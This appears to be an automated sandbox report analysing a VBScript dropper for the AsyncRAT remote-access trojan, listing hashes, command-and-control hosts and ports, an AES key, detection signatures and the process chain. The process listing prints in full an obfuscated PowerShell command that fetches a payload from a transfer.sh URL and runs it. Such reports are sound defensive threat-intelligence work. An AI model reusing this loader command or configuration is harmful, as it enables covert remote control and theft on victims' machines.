Analysis
- max time kernel: 114s
- max time network: 145s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 14/08/2021, 06:40
- Static task: static1
- Behavioral task: behavioral1
- Sample: W092.vbs
- Resource: win7v20210408
General
- Target: W092.vbs
- Size: 1KB
- MD5: eaecbd393f2fffd8522e5d4c7b8b6f7d
- SHA1: 6a9ac84f1c4778cf41ef45b2906919f99a06acf5
- SHA256: 414a79e6c87489cb73e9176e867d554788a28ba86cb4e00f3f8fed15400999bd
- SHA512: 8c24cf0f221c9de102adbfc21f3f762a06b4041963534021ffa7ba4174e149577adb00425066157c9257c3a0f407490754bf58090f8da9096cbe8970b57a42ae
Malware Config
Extracted
- http://transfer.sh/1T8qkDx/ko.txt
Extracted
- asyncrat
- 0.5.7B
- asyncpc.duckdns.org:6650
- asyncpc.duckdns.org:9034
- asyncpc.duckdns.org:6890
- asyncpc.duckdns.org:7829
- 13.77.222.211:6650
- 13.77.222.211:9034
- 13.77.222.211:6890
- 13.77.222.211:7829
- AsyncMutex_6SI8OkPnk
- aes_key: PYYzntkVFJfMofAe4qQYi6HmHf8Kj3BT
- anti_detection: false
- autorun: false
- bdos: false
- delay: Default
- host: asyncpc.duckdns.org,13.77.222.211
- hwid: 3
- install_file:
- install_folder: %AppData%
- mutex: AsyncMutex_6SI8OkPnk
- pastebin_config: null
- port: 6650,9034,6890,7829
- version: 0.5.7B
Signatures
- suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
- Async RAT payload (2 IoCs)
  resource | yara_rule
  behavioral2/memory/2872-158-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
  behavioral2/memory/2872-159-0x000000000040D11E-mapping.dmp | asyncrat
- Blocklisted process makes network request (1 IoCs)
  flow | pid | Process
  9 | 812 | powershell.exe
- Suspicious use of SetThreadContext (1 IoCs)
  description | pid | Process | procid_target
  PID 812 set thread context of 2872 | 812 | powershell.exe | 81
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid | Process
  812 | powershell.exe
  812 | powershell.exe
  812 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 812 | powershell.exe
  Token: SeDebugPrivilege | 2872 | aspnet_regbrowsers.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  description | pid | Process | procid_target
  PID 748 wrote to memory of 812 | 748 | WScript.exe | 73
  PID 748 wrote to memory of 812 | 748 | WScript.exe | 73
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
  PID 812 wrote to memory of 2872 | 812 | powershell.exe | 81
Processes
- C:\Windows\System32\WScript.exe (PID 748, depth 1)
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\W092.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 812, depth 2)
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://transfer.sh/1T8qkDx/ko.txt';$SOS='24-42-20-3d-27-45-54-48-20-43-4f-49-4e-74-2e-57-54-46-20-43-4f-49-4e-6c-49-4f-53-4e-54-27-2e-52-65-70-6c-61-63-65-28-27-45-54-48-20-43-4f-49-4e-27-2c-27-6e-45-27-29-2e-52-65-70-6c-61-63-65-28-27-54-46-20-43-4f-49-4e-27-2c-27-45-62-43-27-29-2e-52-65-70-6c-61-63-65-28-27-4f-53-27-2c-27-65-27-29-3b-24-43-43-20-3d-20-27-44-4f-53-20-43-4f-49-4e-20-4c-53-4f-53-43-4f-49-4e-6e-47-27-2e-52-65-70-6c-61-63-65-28-27-53-20-43-4f-49-4e-20-27-2c-27-57-6e-27-29-2e-52-65-70-6c-61-63-65-28-27-53-4f-27-2c-27-6f-61-44-27-29-2e-52-65-70-6c-61-63-65-28-27-43-4f-49-4e-27-2c-27-54-72-49-27-29-3b-24-41-20-3d-27-49-60-45-6f-73-20-43-4f-49-4e-60-57-60-42-54-43-20-43-4f-49-4e-6a-60-45-54-48-20-43-4f-49-4e-20-24-42-29-2e-24-43-43-28-24-54-52-55-4d-50-29-27-2e-52-65-70-6c-61-63-65-28-27-6f-73-20-43-4f-49-4e-27-2c-27-58-28-6e-60-65-27-29-2e-52-65-70-6c-61-63-65-28-27-42-54-43-20-43-4f-49-4e-27-2c-27-2d-4f-62-27-29-2e-52-65-70-6c-61-63-65-28-27-54-48-20-43-4f-49-4e-27-2c-27-60-63-60-54-27-29-3b-26-28-27-49-27-2b-27-45-58-27-29-28-24-41-20-2d-4a-6f-69-6e-20-27-27-29-7c-26-28-27-49-27-2b-27-45-58-27-29-3b';Invoke-Expression (-join ($SOS -split '-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe (PID 2872, depth 3)
      command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      - Suspicious use of AdjustPrivilegeToken